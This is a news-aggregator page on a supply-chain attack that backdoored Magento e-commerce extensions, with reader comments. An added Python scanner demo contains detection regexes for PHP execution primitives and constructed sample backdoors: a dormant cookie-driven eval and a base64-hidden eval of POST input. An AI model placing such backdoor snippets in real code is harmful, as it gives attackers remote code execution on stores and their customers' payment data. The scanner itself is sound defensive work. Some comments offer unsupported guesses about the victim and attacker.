


Hundreds of E-Commerce Sites Hacked In Supply-Chain Attack (arstechnica.com)
An anonymous reader quotes a report from Ars Technica: Hundreds of e-commerce sites, at least one owned by a large multinational company, were backdoored by malware that executes malicious code inside the browsers of visitors, where it can steal payment card information and other sensitive data, security researchers said Monday. The infections are the result of a supply-chain attack that compromised at least three software providers with malware that remained dormant for six years and became active only in the last few weeks. At least 500 e-commerce sites that rely on the backdoored software were infected, and it's possible that the true number is double that, researchers from security firm Sansec said. Among the compromised customers was a $40 billion multinational company, which Sansec didn't name. In an email Monday, a Sansec representative said that "global remediation [on the infected customers] remains limited."
"Since the backdoor allows uploading and executing arbitrary PHP code, the attackers have full remote code execution (RCE) and can do essentially anything they want," the representative wrote. "In nearly all Adobe Commerce/Magento breaches we observe, the backdoor is then used to inject skimming software that runs in the user's browser and steals payment information (Magecart)." The three software suppliers identified by Sansec were Tigren, Magesolution (MGS), and Meetanshi. All three supply software that's based on Magento, an open source e-commerce platform used by thousands of online stores. A software version sold by a fourth provider named Weltpixel has been infected with similar code on some of its customers' stores, but Sansec so far has been unable to confirm whether it was the stores or Weltpixel that were hacked. Adobe has owned Magento since 2018.
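A heuristic check a store operator can run over a vendor's extension tree, as an added example that is not Sansec's tooling, not code from the Ars article, and not a signature for the specific backdoor it describes. It flags PHP files in which request input or a decoded string reaches an eval-style primitive, and it decodes long base64 string literals and rescans them so a payload that only exists as a string is not missed. The vendor namespace Acme\Widget, the time-gated "license check", and all three sample files are constructed for the demo.

```python
"""Heuristic scan for dormant PHP backdoors in Magento / Adobe Commerce
extension code.  Added example: the regexes are assumptions about what any
upload-and-eval backdoor must contain, not a known-bad signature."""
import base64
import re
import tempfile
from dataclasses import dataclass, field
from pathlib import Path

# Primitives that turn a string into running PHP or an OS command.
DYNAMIC_EXEC = re.compile(
    r"\b(eval|assert|create_function|system|shell_exec|passthru|exec|popen|proc_open)\s*\(", re.I)
# Decoders commonly wrapped around a payload so the call above is not greppable.
DECODERS = re.compile(
    r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(", re.I)
# Attacker-controlled input: request superglobals, raw headers, raw body.
REQUEST_INPUT = re.compile(
    r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b|getallheaders\s*\(|php://input", re.I)
# Ways to drop a second-stage file onto the web root.
FILE_WRITE = re.compile(r"\b(file_put_contents|move_uploaded_file|fwrite)\s*\(", re.I)
# Long base64-looking string literals; decoded and rescanned as a hidden layer.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{20,}={0,2})['\"]")


@dataclass
class Finding:
    path: str
    reasons: list = field(default_factory=list)


def _hidden_layers(src: str) -> list:
    """Decode base64 string literals; keep only the ones that decode to text."""
    layers = []
    for m in B64_LITERAL.finditer(src):
        try:
            layers.append(base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return layers


def scan_source(src: str) -> list:
    """Return human-readable reasons a PHP file looks like a backdoor ([] if clean)."""
    hidden = _hidden_layers(src)
    text = "\n".join([src] + hidden)
    ex, inp = DYNAMIC_EXEC.search(text), REQUEST_INPUT.search(text)
    dec, wr = DECODERS.search(text), FILE_WRITE.search(text)
    reasons = []
    if ex and inp:
        reasons.append(f"request input reaches {ex.group(1)}()")
    if ex and dec:
        reasons.append(f"{dec.group(1)}() feeds {ex.group(1)}()")
    if wr and inp:
        reasons.append(f"request input written to disk via {wr.group(1)}()")
    if any(DYNAMIC_EXEC.search(h) for h in hidden):
        reasons.append("executable PHP hidden inside a base64 string literal")
    return reasons


def scan_tree(root: Path) -> list:
    findings = []
    for p in sorted(root.rglob("*.php")):
        reasons = scan_source(p.read_text(errors="ignore"))
        if reasons:
            findings.append(Finding(p.relative_to(root).as_posix(), reasons))
    return findings


# Constructed sample extension tree (hypothetical vendor Acme\Widget):
# one clean file and two backdoored ones.
CLEAN_BLOCK = """<?php
namespace Acme\\Widget\\Block;
class Banner extends \\Magento\\Framework\\View\\Element\\Template {
    public function getTitle() { return $this->getData('title'); }
    public function getUri() { return $_SERVER['REQUEST_URI']; }
}
"""
# Dormant "license check": does nothing until a date, then evals a cookie value.
DORMANT_HELPER = """<?php
namespace Acme\\Widget\\Helper;
class License {
    public function check() {
        $k = isset($_COOKIE['lic']) ? $_COOKIE['lic'] : null;
        if ($k !== null && time() > 1750000000) { eval(base64_decode($k)); }
        return true;
    }
}
"""
# No eval visible at all: the payload is a base64 literal run via a variable function.
HIDDEN_STAGE = '<?php\n$p = "%s";\n$f = "base64_decode";\n$g = "as" . "sert";\n$g($f($p));\n' % (
    base64.b64encode(b'eval($_POST["x"]);').decode())


def build_sample_tree(root: Path) -> None:
    for rel, body in [("Block/Banner.php", CLEAN_BLOCK),
                      ("Helper/License.php", DORMANT_HELPER),
                      ("etc/Loader.php", HIDDEN_STAGE)]:
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)


def demo() -> list:
    """Build the sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f.path)
        for r in f.reasons:
            print("   ", r)
```

The clean block touches `$_SERVER` but never executes anything, so it is not reported; the two planted files are, including the one whose only greppable `eval` lives inside a base64 literal. Treat hits as a triage list, not a verdict: the check is meant to be run against a vendor's module tree (and against the checked-in copy, to catch a changed update) before the code is deployed, and a real review still has to read every flagged file.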
"Why reinvent the wheel" They asked Zog (Score:3)
So much for (Score:5, Informative)
Herd immunity. You'll all get hit if it's something that has never been seen before in the wild.
This is why I'm using virtual cards more and more for shopping online. Why? Because e-commerce can be no safer than carrying your wallet, full of cash, in a dark alley at night.
Re: (Score:2)
Yeah, I do something similar. I use PayPal to pay everywhere. No direct card information is ever given out. I have a credit account with PP as well as a balance funded by direct deposit. So, everything is paid out of credit and I pay off the credit balance from the PP balance every month. It works out pretty slick, and a side benefit of doing recurring payments from PP is that I can cancel them right from there.
Re: (Score:2)
I did use PayPal a while ago but their changing ToS and crappy service forced me to cancel them.
I remember... (Score:3)
I fondly recall the days when you could disable JavaScript in your browser and the internet still worked. Since this is likely a JavaScript-based exploit triggered by PHP code on the server, turning off JavaScript would be a great mitigation -- but even if you could find a browser that allowed you to disable JS, it would instantly fail to render every website you visited.
Ah... the good old days of static HTML <BLINK>Yippee!</BLINK>
Re: I remember... (Score:2)
Does it? Last time I tried it without js, the whole page didn't load.
Re: (Score:2)
Well, you should be disabling JIT at least. Very few sites require it and that's where most 0 days live (according to Microsoft research, IIRC).
Turtles all the way down. (Score:5, Funny)
People's Supply-Chains Attack Them Due to Supply-Chain Attack By People on Chain of Suppliers
This could have been your headline, Slashdot, but you missed it!
The 40 billion dollar company was Temu (Score:2)
Re: (Score:2)
I hardly ever shop online - and never in China - so all I knew about Temu was the name. Here is what the UK Consumer Association has to say about them [which.co.uk]. If this is a nation-state attack, I wonder if it's the NSA behind it - the nation which most dislikes China is the US (apart from Taiwan which would not dare).